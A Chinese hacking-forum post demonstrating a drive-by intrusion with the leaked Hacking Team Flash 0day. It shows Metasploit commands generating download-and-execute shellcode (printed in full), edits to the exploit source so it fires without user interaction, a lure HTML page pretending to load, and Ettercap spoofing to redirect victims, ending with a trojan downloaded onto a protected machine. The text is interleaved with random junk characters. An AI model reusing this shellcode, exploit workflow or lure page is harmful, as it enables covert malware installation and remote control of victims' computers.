找回密码
 立即注册
查看: 1861|回复: 0
打印 上一主题 下一主题

flash 0day之手工代码修改制作下载者实例入侵演示

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:55 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

# j+ C( r2 Q4 t9 g: S2 R, _- Q: |$ ? 三、flash 0day之手工代码修改制作下载者实例入侵演示 6 J, K @7 x j. D

: k. ]- o. C) s% f- S3 z

' d8 v& z% b. z% |/ t( b 利用到的工具: Y* h) @; _+ x

1 |- H* @$ j. {; J! u

( [0 p- b0 S" h2 A- f Msf 7 n1 Z2 N- s' s: \

% Z* t7 ?0 ~% \$ C# x

5 ~ Q3 Q' V) l Ettercap " O: |6 J' G* U

" I2 @5 o. s; p9 t1 _7 _2 G

1 Q! i# v1 t3 F Z, I Adobe Flash CS6 1 g) E3 f, C8 e" o

, Z5 D1 ^& N$ W2 G9 l2 M

7 Z7 G, L" X( S, W: j Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 4 K# }; G6 b5 K5 [/ s0 r3 Z9 x

8 z! A. v2 t: U- L& `' y7 V

* a: X1 T" G1 j; _" N9 s' N 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_execshow options 0 p- f+ r0 a/ |1 X4 N- x3 U

1 X* \0 v2 p0 `7 K

$ y ? J9 B7 ? 如图: % V( R) @# q+ }; U: B% E

. Z7 o0 I: @4 f. h; p* Y

8 A9 |2 [% H9 }! W2 T$ `   0 \# {$ W8 S6 g

4 v) A g; b3 j2 w

8 T$ [& t1 ~) n7 L; G   ( i' H# ^& m4 p2 f

; ^3 B0 X' f1 Q2 u

( ~5 p: m- n& {5 O4 e( B3 a 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: ) t* r# E7 C1 {

; G" G! `7 e5 M, s M' R

4 J8 g/ W p. c   + f6 n8 N q8 \2 {0 F

+ L% W* z E% A3 F7 p# R; Z

( g6 r/ o9 F. t% h6 b$ c   8 \1 D& [9 J- X* l; y8 x$ R0 f

" P) e: j5 F9 }6 Y

8 r6 Q" ~0 P9 v8 h2 V* ^: k 然后执行generate -t dword生成shellcode,如下: # D9 G. X' {. b% C" `: n( T. h0 R6 C

2 k; O+ w1 r, d

' v7 ` e& S/ l: _2 Q   9 t0 q4 r! u) ^: r

1 j9 T+ `0 A* A. [ X

* m1 h4 x$ g+ H; G; ?, ?* r 复制代码到文本下便于我们一会编辑flash exp,如下: / Q( X6 j5 V, B( n

4 H( h, W: h4 l" }% c

" x& |8 ]# A F: y 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, 1 M) S6 ~. O6 n8 T3 b

4 F+ {& j7 w$ s0 @+ u) S. E, I

! }9 r/ h; S! j- E3 P, }9 v 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, ( a1 r% X/ \6 A3 L( E+ L4 r, C- x

6 `6 j' D, U* V, {( l

, {6 K( r' s$ ^ 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, + f) g6 K: }) S) o0 A

$ I {: J1 }- W3 j, h6 k

' Y( D0 M7 b( X" n7 p# d 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, 3 g" @$ O2 }" |2 n; G& Y

: L: y5 l0 g2 j: N {2 X

}. X: I% @4 x+ k- I( g 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, & z }$ q% X. p3 E

2 F; C0 m" |/ c# c

# U2 w0 L! ] E% }% \. |8 V* U+ ~+ G; u 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, + m# u& P+ ^/ t3 E1 H7 j7 ^0 H

/ E1 m) S- J6 ]2 c* L: A" W7 }. s

. S/ V% K1 \# ~5 E3 T 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, ! W! `8 V4 {5 |, d$ H7 J

) A7 O* j d* B1 R

; k" i- b k* O& d! A' M$ O( u 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, ! Y) ^1 S9 V1 v+ x

. \1 L+ g. O& X; f9 ~- U

4 y$ [) G6 u+ o 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, 1 G, ]/ j( \$ y) L8 ^3 p' B5 L& Y

9 V6 A0 @# ~/ k' ]

) ~2 |" U( e: [. G, J) t 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, 3 O) U5 [- N$ T$ `

* s2 E% P$ ]9 W$ }

G9 X+ `. f, O9 z( k; e9 Z 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, . j1 i. \# J: I0 S& L' ~4 w! H

) H% Z/ Q+ l* b9 G( L& B" t/ V

- U3 B: n$ o- ?7 M 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, ( u; a, \( J) b5 M0 p* T w

8 G+ r s- H, N+ R' C5 K* x& W* a

$ \4 Z& E5 y5 m5 @! o 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, * y/ U, p0 ]; k

9 f: S! q; g) M, Q) d R

' H5 C( [4 H3 S |8 |1 _ 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 4 N' W0 |! W8 c `, U8 v

3 ^" r) d( h- e$ l" [

1 ~! D) |" P* C   ! h: s& ^( F6 \" x

O" A" X7 C' b) O4 ]- X1 {7 V

/ d! _$ ?2 L2 ]: R1 u   ( I1 ~0 p# k% z5 Y

+ {% h" E* W) S* M( o6 Y

) G) G& S# f! z' P) \+ ^" K 下面我们来修改flash 0day exp,需要修改三个文件,分别为: 5 e2 e2 L0 }: F1 r' ]

& }9 @/ a7 M; p- U' ~9 b4 s( D& s! r

- b" b5 u/ h1 T( ]9 o8 y   7 P6 }% z. c: r- k8 P

; J$ b3 K& m: y

/ r. m5 F5 X! v 先修改ShellWin32.as,部分源代码如图: & Q5 k: n2 C- b: V! T

( H" b, i2 ]$ } I

! {/ r9 n# T2 D! [   - ~, L6 h" w4 Z2 }% `1 z( K

t1 D" B' B6 _: |

& |6 i: y" r* M3 D* ?! d7 G& v 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: 1 U/ R5 Y1 ]# T5 r: `- Z

% A5 a. N+ m+ j" y; q0 X

! c- `# B( r5 K- q. h& m' k   ' r: A! d6 x( C. j3 J* j

, }$ F$ M. [- b5 Y% h6 v+ W

$ a( P, H7 q" |6 ^' H9 k j0 \( s 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: 0 j: K4 w9 a1 @0 h2 S: k' i0 a% e0 S

, `% `0 ?! Q) N9 N

0 z0 q. \; P" a- S* y   ( a7 T& O& `# k8 b

& L5 d0 Z% W$ H( o

5 O9 v1 z: m) v 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: 5 H2 @- D3 K j2 n8 I2 A9 @' M) g1 n

5 Z! n$ X ^1 P, w; k& f. }

. U, L0 s: @$ n   ( t- r6 `$ u4 b- F8 U9 ?* X

' G, `0 d9 w% z6 w

9 N3 E& E3 a. j9 }! \+ V2 z9 @   5 ~# A7 U2 b, b) e, w- i% m

. q. R* [; q2 G: Z

3 m5 l, x4 f# s# [4 ]   ) Y5 X8 X* o' T' K8 |8 H

! F. O1 y" H0 `

0 H( A7 q, F% ]* h' h. L ?& Z7 Z 然后点保存,下面我们来编译一下,打开 ' S3 p" O$ k O/ F- I

% g6 [/ G) |2 {4 U

# s, z' y; S. P+ F! c9 G! j exp1.fla然后点文件-发布,看看编译没错误 / s9 [% G& q( n' @: s

! g+ h' z9 A9 C- d G

& |' g' v3 R! e4 R   % e5 U+ b! W3 y/ L

$ h$ K6 b4 L2 Y9 r

4 c, Y5 I# T% P$ F   6 l, J8 i) m) B# e& e9 {8 K" K

. Y% L+ _5 E7 r1 |) q6 y

, o5 O- E$ r0 m0 X: ?, t% {   8 `) B. G, l, h- r7 W' ^

% ]% X$ z0 A1 ^, P

% m5 o8 r6 |5 j- O. G7 O! c   2 \: D' S+ L6 R7 P Y

$ {% G6 C% l/ `$ s% u5 T4 b

* c0 B* H) D# a, h) h. D' A4 i0 c 然后我们把生成的 2 L1 q) w$ K% H7 H/ N V) j6 x

M3 Y* U" y$ U0 r- u* K/ J- P5 O

7 S9 E! N9 g- Y, S" H1 a exp1.swf丢到kailinux /var/www/html下: & c# ?8 A; L; V& I6 v; `; u3 d4 N% z

& w" X! D9 s9 E

, L; l8 \; ^) Q1 J' l 然后把这段代码好好编辑一下 d1 M, h+ O, c; [& |, J0 H

+ A6 I7 z) E$ g3 d+ p4 A

1 m, G& {7 S# U" J! L& {. Z; P) v8 ^   $ L$ k. C) y: s) z

0 O {* f' P' G- ?/ K' j+ u* e `

4 l# H5 y- K- I4 n5 F: P   . p t" @9 A: Z/ q8 K, z% k5 I7 @( g

9 j: J1 r; g; h* S+ {- f. S- F

s0 ^) z* r5 E5 w   1 A. k! s) A4 p' I2 u& i

6 \9 L9 P# i7 a+ w! O3 u

5 q0 D& M; X8 N- i; ^1 q1 N   ! |3 h8 d( A5 w. Q, z! p

{1 r! b* g. O& b( R o

2 I1 { k& L$ O! r5 F   8 F6 ^( L4 W# v2 @* L

9 Y" `: f, r& l* V. ]0 b

; k6 f% P) U4 K. j' k   / [! }; g# _- n" x2 ~& A4 _. W

4 v# Q$ O" u. G3 P/ ?" {: E

1 ]7 p* U6 l; W3 t) N# N! e <!DOCTYPE html> - N8 M' ]' e3 A1 M- D7 s

! B _0 ?: U8 o' U6 _% R6 O. E5 Y

% d6 Q* u5 F0 ?6 M& B! E <html> 0 W1 o* j3 Y0 A5 D f- M9 |

) i6 N- A- }( |) K6 d7 W

+ [+ j, E" B2 ^3 ` <head> 0 T2 s: i: y6 B/ d o F; S6 ?

( c C0 }1 a: m: u" n- g3 a

{3 }" B1 Q' f# n1 ~; S0 g2 d- X <meta http-equiv="Content-Type" content="text/html; " d7 b4 P9 Y( A

' U) H- q% e/ Z

2 ^2 G( ]2 g+ {! {! s- d; r charset=utf-8"/> * P' [8 q! g9 v

- X& |6 W" H3 ?9 L, C) @

# [3 s* i% _! }5 i3 _- h </head> y. |# G; r( G4 O+ |) i1 T& G1 f1 I V

7 H, v0 [* X) ^8 S0 v" m u1 A* E

8 P9 K6 Q# ?+ v; a" T <body> a3 S$ {$ ]4 a( q$ I# B- @9 {

7 u) O; P: b) P/ k

: S5 ~) J: ]' c% ^ <h2> Please wait, the requested page is loading...</h2> ; v7 r+ N+ n3 R) N9 J

& |( a) q; A. F: f8 O& C* m

( c: w/ }: ?' d- O5 v <br> % p, |8 ^9 {0 _5 H, S

6 m; r' n; m- W( q) c% J; r

( X7 \4 {* E h) K <OBJECT , f7 d( z. n0 h7 Z, S+ j

' R" B# m# ^7 F& ~

6 \) J8 P. R+ Y7 \0 M8 ^! z classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000"  WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie / |, Z f K8 X& k

( D# p: U' g$ f8 n0 o5 i. Z

{; s! j: R2 w1 I5 g u4 _& T% W' x VALUE="http://192.168.0.109/exp1.swf"></OBJECT> 4 R) z C! n& d5 H$ u& v- w

4 f* A- _5 g; L; x" i/ a

0 W- @2 N3 C+ N/ m4 U; f7 E7 t+ p, { </body> 3 Y; m: y7 w0 d, @2 @/ c

" b9 {0 p A& R5 V: Z8 e

% [0 Q. ~8 _1 {. Z <script> 4 R# B$ ^& D% i+ }+ x; n% c% y% D% H

, i: _' w* {1 v/ J. S" R6 c- J6 {

2 H+ s# k9 w( E" m: \" a8 T     setTimeout(function () { : o+ x! X$ l2 I6 I" `; M

9 R2 |4 [/ `8 l/ V

& t; j( Q0 q4 E. ^' G1 L8 d9 K/ j          ' k; z* ~5 }5 W. W" l6 A2 y( s4 Y

5 }' h% A+ J& }0 u$ `

# M9 `/ b- ^# Q window.location.reload(); $ t5 R2 }$ U1 y

- g* {0 I- g; r- V4 |

4 f/ f6 ]. y- x4 W5 U! O# d- ?     }, 10000); 6 r# {" G6 U5 G7 P

/ p7 a7 L$ w) l b4 I

) {6 v+ @" P2 e   j( ~! |" e n" _

9 o! s3 D; X: U1 ]

" i( j) f4 }5 D/ ]- @1 V5 m </script> 3 ^% j6 Q2 i1 N/ Y

+ l+ O8 W8 D( p* m; W. X3 L

$ S7 n% t( {+ S9 {9 O2 r6 J y </html> : x1 H. z# l8 G

3 H# |# z2 t# G; |: y

8 t) u5 w8 E: W% C. w. Q   2 t/ b5 H# o. V4 t: ^- W

; e( H5 T) X! |6 K( y

. A& N/ J/ Q9 C0 s 注意:192.168.0.109kaliip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: 3 C1 H" C, F; i; j

8 S- b3 U+ F& w7 S

7 R% v# k4 o) r! Q$ Q2 X   ( W# i+ `( d2 p3 Q# P& ^9 R( E

" [& Z: N/ w0 _6 @7 c# [! H

0 M& M1 {' }0 f& u2 ]' P: D9 o1 r   8 ^+ |$ j: k+ r) R: u7 o& j+ y) E

% \8 ]5 B, M& C3 q

: B P+ }3 H! h! K- @- h6 z* K5 I   4 Z2 P" d9 E) }, \

; C# S* _: e9 e }. N) ~+ L

. A _. p; A7 q: a   * g2 x3 O0 m" ]- x, ^( j" ]

- p* F; @: o& i% D8 B- E

C8 u7 D) M$ g! B' L7 L   4 m- `1 ^! a0 w6 g# J5 B

7 `0 f) n9 z1 w3 J

: F$ e' L: K6 n% R 下面我们用ettercap欺骗如图: / o" J. F* i! [1 a O* g. O9 ^

' {# p" X; X- f* L

( A) e: c! l; C8 o/ s   " n: N& U" o2 z

2 a9 K! d+ l( r6 P0 @% }" n

4 Z' {9 j7 d* N* ~( k6 p$ q   & \ t5 ^) E% a, W

% w% U3 n8 r6 L5 Y9 i& E- U' S7 ]) s

0 ?, j- v& V" I0 v& E: p' v' B 下面我们随便访问个网站看看: # t% B" [- H% ^: W

6 [' ^# _& y6 ^

/ d9 g; a& o0 c 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: $ V3 c- A3 W W8 _; K8 n* ]

/ ^' I) Y& w: X# q1 p* P: X

6 T; s# b+ T9 K   3 U# Q1 ?. _& b. v

" r) x/ M' C) G: U7 ^

; H* @' m* l+ [. M! Z, a 我们看另一台, 1 s* W x! x' U$ O8 A. p

4 w& C$ H i, ~+ A0 ~ j

3 r2 ^1 }9 e& p% K; Z# B 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 - \& Q+ Z' c' K" M) x

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表